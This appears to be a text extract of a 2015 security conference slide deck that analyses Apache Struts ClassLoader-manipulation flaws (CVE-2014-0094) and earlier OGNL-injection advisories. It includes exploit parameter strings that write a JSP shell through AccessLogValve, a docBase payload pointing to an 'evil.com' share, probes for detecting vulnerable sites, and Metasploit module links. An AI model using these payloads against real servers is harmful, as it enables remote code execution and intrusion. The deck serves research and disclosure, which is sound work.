RootedCON 2015 - Deep inside the Java framework Apache Struts

1. Deep inside the Java framework Apache Struts Julián Vilas

2. Whoami •  Julián Vilas (Redsadic) – @julianvilas •  Security Analyst & Researcher

3. ¿Apache Struts? Java framework – for Java webapps – Two major versions • Struts 1.x (EoL since 2013) • Struts 2.x

4. Why Struts? •  (Mar 2014) CVE-‐2014-‐0094 goes public •  What the hell was it? – Struts 2 vulnerability – UnauthenVcated – All versions aﬀected – Could lead to RCE

5. CVE-‐2014-‐0094 “ParametersInterceptor allows access to 'class' parameter which is directly mapped to getClass() method and allows ClassLoader manipulaVon” •  Credits: –  Peter Magnusson –  Przemysław Celej •  A^er reading it… –  Let’s go learning some basics

6. OGNL Object Graph NavigaVon Language •  Expression Language for gedng and sedng properVes of Java objects – Objects that are stored in the Context

7. top OGNL #foo.dummy // foo.getDummy() #bar.dummy // bar.getDummy() dummy // qux.getDummy() dummy = “RootedCON” // qux.setDummy(“RootedCON”) foo bar baz qux Context root foo bar qux …. Struts2 OGNL Context (AcDonContext) ValueStack

8. Struts 2 request processing 1 7 Filter Dispatcher Interceptors AcVon Result /example/hello.acDon HTML 1 7 User 2 3 4 56 hMp://struts.example.com/example/hello.acDon HTML ParametersInterceptor Struts2 app

9. ParametersInterceptor “This interceptor gets all parameters from AcVonContext.getParameters() and sets them on the value stack by calling ValueStack.setValue(String, Object)” “Because parameter names are eﬀecDvely OGNL statements, it is important that security be taken into account” hpp://struts.apache.org/release/2.0.x/struts2-‐core/apidocs/com/opensymphony/xwork2/interceptor/ ParametersInterceptor.html

10. ParametersInterceptor example … HelloWorldAcVon … AcDonContext ValueStack PUSH LOOKUP SETTER SET

11. ParametersInterceptor example

12. Available methods Methods that can be reached – As seen, OGNL allows us to reference gepers and sepers execute() getUsername() setUsername() HelloWorldAcDon ? AcDonSupport EXTENDS

13. AcVonSupport methods

14. Available methods Methods that can be reached – As seen, OGNL allows us to reference gepers and sepers execute() getUsername() setUsername() HelloWorldAcDon … getErrors() getTexts() getFieldErrors() getAcDonErrors() getAcDonMessages() getErrorMessages() … AcDonSupport EXTENDS

15. AcVonSupport

16. Available methods Methods that can be reached – As seen, OGNL allows us to reference gepers and sepers execute() getUsername() setUsername() HelloWorldAcDon … getErrors() getTexts() getFieldErrors() getAcDonErrors() getAcDonMessages() getErrorMessages() … AcDonSupport EXTENDS … getClass() … Object EXTENDS

17. NavigaVng objects •  Parameters are evaluated iteraVvely as an AST chain, composed by – A chain of gepers (without parameters) – Ending with a seper (1 String, boolean or int parameter)

18. Looking for sepers •  Through object navigaVon reach several seper methods not part of the AcVon can be reached –  What methods? •  Post published by neobyte hpp://sec.baidu.com/index.php?research/detail/id/18 1.  PoC for gedng reachable sepers 2.  A method for gedng RCE on Tomcat 8

19. DEMO Struts Tester on Tomcat 6 / 7 & Tomcat 8 customized & commented version ready to use hpps://github.com/julianvilas/rooted2k15

20. Exploitability Tested against: •  Tomcat 6 / 7 à RCE via “docBase” (win only) •  Tomcat 8 à RCE via “AccessLogValve” •  Glassﬁsh 4 à RCE via “docBase” (win only) •  Websphere 8.5 (developer) à RCE not found •  Weblogic 10 & 12 à RCE not found •  JBOSS 7.1 & 7.4 à RCE not found

21. What about Struts 1 •  According to CVE-‐2014-‐0114, Struts 1 is also vulnerable •  Unpatched! (struts 1 is over EoL, but is sVll in use) •  Different reason: Struts 1 no OGNL nor Value Stack –  The key: bean populaVon with BeanUVls •  You can find some Alvaro Muñoz (@pwntester) gold, like further explanaVon and a filter to be applied as a workaround, at –  hpp://h30499.www3.hp.com/t5/HP-‐Security-‐Research-‐Blog/Protect-‐your-‐ Struts1-‐applicaVons/ba-‐p/6463188#.VBMB0i5_s0z –  hpp://h30499.www3.hp.com/t5/HP-‐Security-‐Research-‐Blog/Update-‐your-‐ Struts-‐1-‐ClassLoader-‐manipulaVon-‐filters/ba-‐p/6639204#.VOsFG7CG_8Q

22. AccessLogValve exploitaVon A log file with name shell1.jsp is created at webapps/ROOT. When requesVng a inexistent URL, it’s logged into the log file (that it’s going to be interpreted as a JSP when get accessed). .directory=webapps/ROOT .prefix=shell .suffix=.jsp .fileDateFormat=1 1 2 3 4

23. DEMO AccessLogValve exploitaVon hpps://github.com/rapid7/metasploit-‐framework/blob/master/modules/exploits/ mulV/hpp/struts_code_exec_classloader.rb

24. docBase exploitaVon •  “The Document Base (also known as the Context Root) directory for this web applicaVon, or the pathname to the web applicaDon archive ﬁle (if this web applicaVon is being executed directly from the WAR ﬁle).” •  Legit applicaVon goes down .docBase=//evil.com/shared

25. About metasploit module •  Tomcat 6/7 & GlassFish (docBase) – Only Win – Not landed yet in trunk but works ﬁne – Maphew Hall (0x41414141) pull requests: hpps://github.com/rapid7/metasploit-‐framework/pull/3074 hpps://github.com/rapid7/metasploit-‐framework/pull/3075 hpps://github.com/rapid7/metasploit-‐framework/pull/3323 – Same module than before, landed yesterday night

26. DEMO docBase exploitaVon

27. I know Kung-‐fu •  Now what?

28. Searching Struts sites •  Dumb detecVon of Struts 2 sites – Default extension for Struts 2: “.acVon” •  Also, when default conﬁgured, it accepts both “.acVon” and no extension

29. Searching Struts sites

30. Searching Struts sites

31. Searching Struts sites •  Dumb detecVon of Struts 1 sites – Default extension for Struts 1: “.do”

32. Searching Struts sites hpps://web.archive.org/web/20060519001958/hpp://simonpeter.com/technology/ java/struts/sites.html

33. Vulnerability checking •  To check if a Struts 2 site is vulnerable, modify “cacheMaxSize” property –  Integer.MAX_VALUE == 2147483647 (in x86) •  Tomcat 6/7 & Glassﬁsh •  Tomcat 8 2147483647 2147483648 AAAAAAAAA

34. Vulnerability checking •  In Struts 1 if the conversion String to Integer fails a default value 0 is set •  But when trying to set a method that receives an Object with a String, a excepVon is raised ROOTEDCON

35. OK I see, but…

36. Previous security bulleVns RCE, when form validaDon fails field values are interpreted as OGNL RCE, bypass the '#'-‐usage protecDon built into the ParametersInterceptor to execute OGNL RCE, bypass the '#'-‐usage protecDon built into the ParametersInterceptor to execute OGNL ! S2-‐003 fix was incomplete RCE, user’s input is evaluated as OGNL when there’s a conversion error Several RCE: via ExcepDonDelegator (same as S2-‐007), CookieInterceptor (same idea than S2-‐003 and S2-‐005), etc. RCE, incomplete fix for S2-‐003 and S2-‐005 on ParametersInterceptor

37. Previous security bulleVns RCE, incomplete fix for S2-‐003, S2-‐005 and S2-‐009 on ParametersInterceptor when using values for redirecDons RCE, s:url and s:a tags, when "includeParams" is set, allow evaluaDng the values of request parameters as OGNL. RCE, same than S2-‐013, incomplete fix. RCE, acDons using wildcards and Double OGNL evaluaDon allow OGNL injecDon RCE: DefaultAcDonMapper short-‐circuit navigaDon interpreted as OGNL RCE, what we saw in this presentaDon ☺ (ParametersInterceptor) RCE, Incomplete fix for S2-‐020 Incomplete fix for S2-‐020 and S2-‐021

38. Previous security bulleVns

39. Conclusions? •  Seven years from between S2-‐001 and S2-‐020 •  Same kind of vulnerabiliVes: injecDng OGNL from user-‐supplied data •  Several bypasses for ﬁxes •  Almost all RCE •  Take your own…

40. Bonus track -‐ Confluence •  Is based on a WebWork fork (previous than Struts 2) •  If you look their bulleVns –  Versions up to and including 5.5.1 vulnerable to ClassLoader manipulaDon hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory +2014-‐05-‐21 –  Versions up to 5.6 (before 5.6.6 and 5.5.7) are vulnerable to double OGNL evaluaDon hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-‐ +2015-‐01-‐21 •  Don’t they look familiar? J

41. Bonus track -‐ Conﬂuence

42. QuesVons? •  You can ask also : – Poke me around – by twiper: @julianvilas

43. QuesVons? •  And what do you think about OGNL? Thanks for aMending!!! ☺

RootedCON 2015 - Deep inside the Java framework Apache Struts

You are reading a preview.

Check these out next

RootedCON 2015 - Deep inside the Java framework Apache Struts

More Related Content

Slideshows for you (20)

Viewers also liked (16)

Similar to RootedCON 2015 - Deep inside the Java framework Apache Struts (20)

Recently uploaded (20)